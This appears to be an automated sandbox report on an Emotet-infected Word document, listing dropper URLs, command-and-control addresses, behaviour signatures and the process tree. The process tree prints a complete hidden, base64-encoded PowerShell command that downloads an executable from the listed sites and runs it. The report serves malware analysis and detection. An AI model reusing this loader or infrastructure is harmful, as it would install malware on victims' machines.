Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    18-12-2019 16:26

General

  • Target

    97523d357cab18183af27fb0ad4f5a0c67ec98dbf38d98a9e1041ba43c06a4c0

  • Sample

    191218-nwrxkk8g5a

  • SHA256

    97523d357cab18183af27fb0ad4f5a0c67ec98dbf38d98a9e1041ba43c06a4c0

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://biswascreation.com/jodp17ksjfs/1flxhgo/

exe.dropper

https://expoblockchain2020.com/cgi-bin/2/

exe.dropper

https://mag-flex.com/wp-admin/xf8q/

exe.dropper

https://www.harriscustomcatering.com/wp-includes/jCItk01ogb/

exe.dropper

https://fdigitalsolutions.com/cgi-bin/mzqjn4h/

Extracted

Family

emotet

C2

1.215.28.101:8080

184.167.148.162:80

66.25.34.20:80

165.227.156.155:443

167.99.105.223:7080

67.225.179.64:8080

176.31.200.130:8080

190.220.19.82:443

91.242.138.5:443

159.65.25.128:8080

61.197.110.214:80

110.143.84.202:80

95.128.43.213:8080

91.73.197.90:80

201.184.105.242:443

108.179.206.219:8080

181.57.193.14:80

188.152.7.140:80

139.130.241.252:443

197.254.221.174:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\97523d357cab18183af27fb0ad4f5a0c67ec98dbf38d98a9e1041ba43c06a4c0.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:4972
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABTAGMAeQBvAHoAbQBmAHkAdAB6AD0AJwBYAGoAdABoAGgAaQBtAHUAZgBvAGEAJwA7ACQASgBxAHUAbQBoAGoAcwBqAGcAIAA9ACAAJwA2ADAAMwAnADsAJABRAHQAcgBqAHMAdwByAHIAZAB5AHgAPQAnAE0AeAB6AGoAaABpAHoAeABkACcAOwAkAFYAYQB2AGQAaAB6AGQAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBxAHUAbQBoAGoAcwBqAGcAKwAnAC4AZQB4AGUAJwA7ACQASwBiAHQAaQBnAGQAYwBpAD0AJwBWAGwAZwBqAGcAZAB5AGYAZgB2ACcAOwAkAEoAaQB3AGcAawBwAGgAegB2AGIAZAA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgB3AGUAQgBDAEwAaQBlAE4AdAA7ACQARQB0AGQAbABwAGwAeABkAD0AJwBoAHQAdABwAHMAOgAvAC8AYgBpAHMAdwBhAHMAYwByAGUAYQB0AGkAbwBuAC4AYwBvAG0ALwBqAG8AZABwADEANwBrAHMAagBmAHMALwAxAGYAbAB4AGgAZwBvAC8AKgBoAHQAdABwAHMAOgAvAC8AZQB4AHAAbwBiAGwAbwBjAGsAYwBoAGEAaQBuADIAMAAyADAALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAyAC8AKgBoAHQAdABwAHMAOgAvAC8AbQBhAGcALQBmAGwAZQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AGYAOABxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBoAGEAcgByAGkAcwBjAHUAcwB0AG8AbQBjAGEAdABlAHIAaQBuAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGoAQwBJAHQAawAwADEAbwBnAGIALwAqAGgAdAB0AHAAcwA6AC8ALwBmAGQAaQBnAGkAdABhAGwAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBtAHoAcQBqAG4ANABoAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEEAYQB3AGYAZQBzAGcAYgB0AG4AZgBxAD0AJwBDAGoAbAB6AHcAcABhAHkAcQBtAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAcgBrAGQAYgBiAGMAYwBjACAAaQBuACAAJABFAHQAZABsAHAAbAB4AGQAKQB7AHQAcgB5AHsAJABKAGkAdwBnAGsAcABoAHoAdgBiAGQALgAiAEQAbwBgAHcATgBsAE8AYQBgAEQARgBpAEwARQAiACgAJABZAHIAawBkAGIAYgBjAGMAYwAsACAAJABWAGEAdgBkAGgAegBkAHkAKQA7ACQARQBiAHIAeAB0AHIAcgBiAD0AJwBBAHoAagBiAG0AcABpAGcAcQBrACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVgBhAHYAZABoAHoAZAB5ACkALgAiAGwAYABFAGAATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAA5ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQAVgBhAHYAZABoAHoAZAB5ACkAOwAkAFUAZgB6AHYAcwBjAGoAagBtAGUAcwA9ACcAQwBwAGwAeQBoAG8AaQB3AGsAYQBtAG4AbgAnADsAYgByAGUAYQBrADsAJABGAGMAcABqAGQAbAB3AHIAdQA9ACcAWgBrAGMAbwB1AHIAegBuAG4AdAB1AHIAZAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAGsAZgBtAGgAZQB0AGIAZQBqAHAAaQA9ACcARgB4AHIAYwBoAHAAeQB1AHYAZwB2ACcA
    1⤵
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4692
    • C:\Users\Admin\603.exe
      "C:\Users\Admin\603.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:3856
      • C:\Users\Admin\603.exe
        --e92d0397
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4416

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3856-9-0x0000000000640000-0x0000000000657000-memory.dmp

    Filesize

    92KB

  • memory/4416-11-0x0000000000660000-0x0000000000677000-memory.dmp

    Filesize

    92KB

  • memory/4416-12-0x0000000000400000-0x00000000004C1000-memory.dmp

    Filesize

    772KB

  • memory/4972-2-0x000002466E61A000-0x000002466E61D000-memory.dmp

    Filesize

    12KB